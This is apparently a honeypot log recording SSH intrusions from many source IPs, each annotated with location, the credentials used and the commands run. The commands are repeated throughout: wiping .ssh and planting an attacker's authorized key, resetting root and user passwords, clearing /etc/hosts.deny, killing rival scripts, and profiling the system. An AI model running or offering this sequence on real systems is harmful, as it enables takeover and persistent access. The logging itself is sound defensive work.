$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:Mp0i3msm6mLZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\nkIWA9u7Nb37O\nkIWA9u7Nb37O"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nkIWA9u7Nb37O\nkIWA9u7Nb37O\n"|passwd
🎭 cipher_root_31 (103.164.9.74) β€” Karachi, Pakistan Β· 1 session Β· 19 cmds
2026-06-08 18:22 EDT Β· as root/Qwert123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:uz8NEFT32FLB"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_25 (34.58.124.191) β€” Council Bluffs, United States Β· 1 session Β· 19 cmds
2026-06-08 18:13 EDT Β· as root/Kp123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:lRhFng2Ntlnh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_3 (36.133.214.135) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-06-08 18:02 EDT Β· as kwang/kwang
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "kwang\njU5eTEjlQ0yk\njU5eTEjlQ0yk"|passwd|bash
$ Enter new UNIX password:
$ echo "kwang\njU5eTEjlQ0yk\njU5eTEjlQ0yk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_16 (159.203.83.195) β€” Clifton, United States Β· 1 session Β· 19 cmds
2026-06-08 17:20 EDT Β· as root/123456789aA
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:lM8q2d2oMNHU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_17 (165.154.254.11) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-06-08 17:12 EDT Β· as client/client@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "client@2025\nZgYU3lACxHMk\nZgYU3lACxHMk"|passwd|bash
$ Enter new UNIX password:
$ echo "client@2025\nZgYU3lACxHMk\nZgYU3lACxHMk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_2 (161.132.52.94) β€” Lima, Peru Β· 1 session Β· 1 cmd
2026-06-08 15:19 EDT Β· as jimster/jimster.2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root_32 (45.78.207.244) β€” Singapore, Singapore Β· 1 session Β· 8 cmds
2026-06-08 15:13 EDT Β· as root/ahmedandmona
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:S6yaXQJaqMth"|chpasswd|bash
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_17 (43.135.135.17) β€” Santa Clara, United States Β· 3 sessions Β· 59 cmds
2026-06-08 14:11 EDT Β· as jason/jason123, root/hellohello, user/zhbjETuyMffoL8F
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "zhbjETuyMffoL8F\nYuXjAr21AqSv\nYuXjAr21AqSv"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "zhbjETuyMffoL8F\nYuXjAr21AqSv\nYuXjAr21AqSv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:PZAb4DEMzzcL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "jason123\nAxIi5NhA0Qq0\nAxIi5NhA0Qq0"|passwd|bash
$ echo "jason123\nAxIi5NhA0Qq0\nAxIi5NhA0Qq0\n"|passwd
🎭 cosmo_root_2 (185.228.135.197) β€” Rostov-on-Don, Russia Β· 3 sessions Β· 59 cmds
2026-06-08 14:12 EDT Β· as jason/jason123, root/hellohello, user/zhbjETuyMffoL8F
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:EtK94XeWYYZn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "jason123\n1nbNkPZluWQV\n1nbNkPZluWQV"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "jason123\n1nbNkPZluWQV\n1nbNkPZluWQV\n"|passwd
$ echo -e "zhbjETuyMffoL8F\nIXhhcb8upEgm\nIXhhcb8upEgm"|passwd|bash
$ echo "zhbjETuyMffoL8F\nIXhhcb8upEgm\nIXhhcb8upEgm\n"|passwd
🎭 wraith_root_35 (161.132.38.234) β€” Lima, Peru Β· 3 sessions Β· 59 cmds
2026-06-08 14:12 EDT Β· as jason/jason123, root/hellohello, user/zhbjETuyMffoL8F
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "zhbjETuyMffoL8F\nLNhwWRp2YPj3\nLNhwWRp2YPj3"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "zhbjETuyMffoL8F\nLNhwWRp2YPj3\nLNhwWRp2YPj3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "jason123\n1nbNkPZluWQV\n1nbNkPZluWQV"|passwd|bash
$ echo "jason123\n1nbNkPZluWQV\n1nbNkPZluWQV\n"|passwd
$ echo "root:fW0JqFDNaZ2I"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 yankee_root_8 (103.143.11.150) β€” Los Angeles, United States Β· 4 sessions Β· 79 cmds
2026-05-11 07:26 EDT Β· as jason/jason123, root/hellohello, ubuntu/testpass
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:15zR5zYCJvgw"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "zhbjETuyMffoL8F\nVh8X3wz5hZT9\nVh8X3wz5hZT9"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "zhbjETuyMffoL8F\nVh8X3wz5hZT9\nVh8X3wz5hZT9\n"|passwd
$ echo -e "jason123\nWCjPVdHeDjuD\nWCjPVdHeDjuD"|passwd|bash
$ echo "jason123\nWCjPVdHeDjuD\nWCjPVdHeDjuD\n"|passwd
$ echo -e "testpass\nbEr2bdlXCfrL\nbEr2bdlXCfrL"|passwd|bash
$ echo "testpass\nbEr2bdlXCfrL\nbEr2bdlXCfrL\n"|passwd
🎭 phantom_sol_2 (101.32.240.31) β€” Singapore, Singapore Β· 4 sessions Β· 79 cmds
2026-06-03 16:54 EDT Β· as fds/fds, jason/jason123, root/hellohello
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "jason123\nTF0PZ89IkIp8\nTF0PZ89IkIp8"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "jason123\nTF0PZ89IkIp8\nTF0PZ89IkIp8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:ZD3dddOlVUJH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "zhbjETuyMffoL8F\nz4sPOriZ85gr\nz4sPOriZ85gr"|passwd|bash
$ echo "zhbjETuyMffoL8F\nz4sPOriZ85gr\nz4sPOriZ85gr\n"|passwd
$ echo -e "fds\nmDI67gwwq2Uy\nmDI67gwwq2Uy"|passwd|bash
$ echo "fds\nmDI67gwwq2Uy\nmDI67gwwq2Uy\n"|passwd
🎭 dragon_root_6 (115.190.243.99) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-06-08 14:42 EDT Β· as root/recovery
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:MJR7CUOsXO8v"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_8 (103.180.213.153) β€” New Delhi, India Β· 1 session Β· 20 cmds
2026-06-08 14:20 EDT Β· as caleb/caleb
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
